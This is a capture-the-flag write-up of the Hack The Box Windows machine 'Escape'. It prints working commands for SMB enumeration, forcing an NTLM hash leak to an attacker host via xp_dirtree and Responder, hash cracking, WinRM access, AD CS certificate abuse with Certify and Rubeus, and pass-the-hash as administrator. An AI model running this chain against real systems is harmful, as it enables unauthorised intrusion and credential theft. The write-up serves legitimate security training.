Box: Escape
Platform: Hack The Box
OS: Windows
Platform Difficulty: Medium
User Difficulty: 4.6
My Difficulty Rating: User 4 / Root 5
Summary (Spoilers)
For gaining a foothold, we first enumerate the target using nmap to discover open ports and services. We then access an SMB share to retrieve a PDF containing MSSQL credentials and an employee’s email address. Using these credentials, we log into the MSSQL server and execute a command to capture an NTLM hash via a relay attack. Cracking this hash provides us access to the system as the sql_svc user. Further investigation leads us to log files revealing another user’s credentials, allowing us to access the system as Ryan.Cooper.
For privilege escalation, we exploit the Active Directory Certificate Services (AD CS) by requesting a certificate with Certify.exe and impersonating the administrator user. We then use Rubeus.exe to obtain the administrator’s NTLM hash, which grants us full control over the system.
Enumeration
The initial enumeration shows a lot of open ports, as is typical for Windows machines.
└─$ sudo nmap -Pn -p- 10.10.11.202
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 05:22 EST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.025s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49686/tcp open unknown
49727/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 106.94 secondsExplanation: -Pn: Treats all hosts as online, skipping host discovery. -p-: Scans all 65535 ports.
Let’s take a look at the top ports and see what’s running on them.
└─$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -A 10.10.11.202
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 05:25 EST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-09 18:25:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
<...SNIP...>
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
<...SNIP...>
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-09T18:27:15+00:00; +7h59m59s from scanner time.
<...SNIP...>
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-09T18:27:15+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-03-09T18:27:15+00:00; +7h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message FramingExplanation: -A: Enables OS detection, version detection, script scanning, and traceroute. -p: Specifies which ports to scan.
With no website present, SMB is the logical starting point for our investigation.
└─$ smbclient -L \\10.10.11.202
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableExplanation: Lists shares on the target machine.
We find an accessible file share and connect to it. We find a PDF and download it to our machine for further examination.
└─$ smbclient \\10.10.11.202\Public --no-pass
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1438517 blocks available
smb: > get "SQL Server Procedures.pdf"
getting file SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (293.3 KiloBytes/sec) (average 293.3 KiloBytes/sec)Explanation: Connects to the Public share on the target machine without using a password.
When we open the file, we see some information about the setup procedures for an SQL Server. We find some interesting information on page 2.
So we have our first credentials that should be valid for MSSQL: PublicUser:GuestUserCantWrite1
In addition, there is a link in the document that reveals an employee’s email address: mailto:brandon.brown@sequel.htb
We have some hostnames from the email address and the Nmap scan, we add them to the /etc/hosts file.
10.10.11.202 sequel.htb dc.sequel.htb sequelFoothold
We have credentials, and an MSSQL server appears to be running on port 1433. So let’s try logging in as PublicUser.
└─$ mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DCSQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> Explanation: Logs into the MSSQL server using the provided credentials.
The login attempt was successful. Some attempts to elevate privileges or find useful information are unsuccessful. But with SMB and SQL present on a Windows machine, we always have to think about the possibility of stealing an NTLM hash.
So let’s prepare and execute this attack.
# On the attack box
└─$ sudo responder -I tun0Explanation: Starts the Responder tool on the attack box to capture NTLM hashes.
# On the victim machine
SQL> xp_dirtree '\10.10.16.7anything'Explanation: Triggers an SMB request from the victim machine to our attack box, capturing an NTLM hash.
It works and we get the hash of the sql_svc user in the responder.
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequelsql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:980c25461d8a650a:60825E7C6F321C087C2E786BC112A0D1:010100000000000000D1B88DE571DA0149D4520D6E99D5BD0000000002000800470035004300370001001E00570049004E002D005A004900470057005700530042004D0034004B00430004003400570049004E002D005A004900470057005700530042004D0034004B0043002E0047003500430037002E004C004F00430041004C000300140047003500430037002E004C004F00430041004C000500140047003500430037002E004C004F00430041004C000700080000D1B88DE571DA0106000400020000000800300030000000000000000000000000300000C31FE7717C411A623DE269BCC7D6B5842BF6AA6621D822A505CE42DF9CA061D40A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0037000000000000000000We copy the hash to a file named hash and crack it with hashcat.
└─$ hashcat hash /usr/share/wordlists/rockyou.txt -m 5600
hashcat (v6.2.6) starting
<...SNIP...>
SQL_SVC::sequel:7c126225e088479b:bebc725dabaf15a139ac431c7702fdc5:010100000000000000d067285271da01f150227baed952dc000000000200080048005a004400520001001e00570049004e002d004500420058004600550053005500380039004800560004003400570049004e002d00450042005800460055005300550038003900480056002e0048005a00440052002e004c004f00430041004c000300140048005a00440052002e004c004f00430041004c000500140048005a00440052002e004c004f00430041004c000700080000d067285271da0106000400020000000800300030000000000000000000000000300000817ae43893227513817b7edeed37e6e5f776630c7d76f4a1be8ef0c1479e20e10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
<...SNIP...>Explanation: Uses hashcat to crack the NTLM hash using the rockyou.txt wordlist.
Since port 5985 is open, we try to log in with WinRM. This succeeds and we have a foothold on the victim machine. Since there is no flag in the Desktop folder, we need to escalate our privileges to another user.
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Userssql_svcDocuments>Explanation: Logs into the victim machine using WinRM with the credentials obtained from cracking the NTLM hash.
User
We have access to a SQL log file in the SQLServer folder.
*Evil-WinRM* PS C:SQLServerLogs> dir
Directory: C:SQLServerLogs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAKLet’s take a closer look at it.
*Evil-WinRM* PS C:SQLServerLogs> type ERRORLOG.BAK
<...SNIP...>
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htbRyan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
<...SNIP...>There appears to have been an unsuccessful logon attempt by the user Ryan.Cooper. Judging by the information in the file, we can assume that the user accidentally entered his password in the user field. So we can try the credential pair Ryan.Cooper:NuclearMosquito3.
We successfully log into the victim machine and find the user.txt flag in Ryan.Cooper‘s desktop.
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> dir ..Desktop
Directory: C:UsersRyan.CooperDesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/9/2024 10:21 AM 34 user.txtExplanation: Logs into the victim machine using WinRM with Ryan.Cooper’s credentials.
Privilege Escalation
After some time with no progress, we see if we can exploit the Active Directory Certificate Services (AD CS).
└─$ crackmapexec ldap 10.10.11.202 -d sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3' -M adcs
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [+] sequel.htbRyan.Cooper:NuclearMosquito3
ADCS 10.10.11.202 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS Found PKI Enrollment Server: dc.sequel.htb
ADCS Found CN: sequel-DC-CAExplanation: Uses CrackMapExec to check for AD CS vulnerabilities using Ryan.Cooper’s credentials.
The services are installed and there are a number of different attack vectors. We decide to follow Hacktricks and use the tool Certify.exe, which we upload to the victim machine, using the upload feature of Evil-WinRM.
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> upload Certify.exe
Info: Uploading /home/kali/Downloads/escape/Certify.exe to C:UsersRyan.CooperDocumentsCertify.exe
Data: 232104 bytes of 232104 bytes copied
Info: Upload successful!We start by checking the ESC1 attack path, looking for vulnerable certificate templates.
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> .Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
________|_| __|_|_| __, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htbsequel-DC-CA
<...SNIP...>
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htbsequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelDomain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
<...SNIP...>The UserAuthentication template is vulnerable, so we request a ticket to impersonate the administrator user.
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> .Certify.exe request /ca:dc.sequel.htbsequel-DC-CA /template:UserAuthentication /altname:administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
________|_| __|_|_| __, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequelRyan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator
[*] Certificate Authority : dc.sequel.htbsequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 13
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAyRfyynpE3c57zWJIm/R6N2wdwb9xUrJWt9iblw3q/kQDGA0v
<...SNIP...>
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA3KpZGcp3kfogAAAAAADTANBgkqhkiG9w0BAQsF
<...SNIP...>
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.3978108We save the certificate in a file named cert.pem (from the beginning of the RSA key to the end of the certificate) and convert it to a .pfx file.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:Explanation: Converts the certificate from PEM format to PFX format for use with Windows authentication mechanisms.
We upload the cert.pfx file to the victim machine using Evil-WinRM.
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> upload cert.pfx
Info: Uploading /home/kali/Downloads/escape/cert.pfx to C:UsersRyan.CooperDocumentscert.pfx
Data: 4564 bytes of 4564 bytes copied
Info: Upload successful!We also need the Rubeus.exe tool n the box for the next step.
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> upload Rubeus.exe
Info: Uploading /home/kali/Downloads/escape/Rubeus.exe to C:UsersRyan.CooperDocumentsRubeus.exe
Data: 595968 bytes of 595968 bytes copied
Info: Upload successful!Now we can use the certificate for example to show the NTLM hash.of the administrator.
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> .Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:'' /getcredentials
______ _
(_____ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ | ___ | | | |/___)
| | | |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htbadministrator'
[*] Using domain controller: fe80::19df:ff75:b20:ede8%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
<...SNIP...>
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
Explanation: Uses Rubeus to request a Ticket-Granting Ticket (TGT) for the user “administrator” using cert.pfx with an empty password and trys to retrieve the credentials associated with that user.
And with the NTLM hash, we can now authenticate from the attack box as administrator. We have access to the root.txt file and have successfully rooted the box.
└─$ evil-winrm -i 10.10.11.202 -u administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersAdministratorDocuments> dir ..Desktop
Directory: C:UsersAdministratorDesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/9/2024 10:21 AM 34 root.txtExplanation: Logs into the victim machine as administrator using WinRM with NTLM hash authentication.
Final Thoughts
I believe the box falls into the easier spectrum of medium difficulty. It presents some typical attack vectors for Windows systems. Initially, breaching Windows may appear more complex compared to Linux. However, as one gains experience, attacking Windows systems becomes quite enjoyable.
Featured Image: DALL-E 3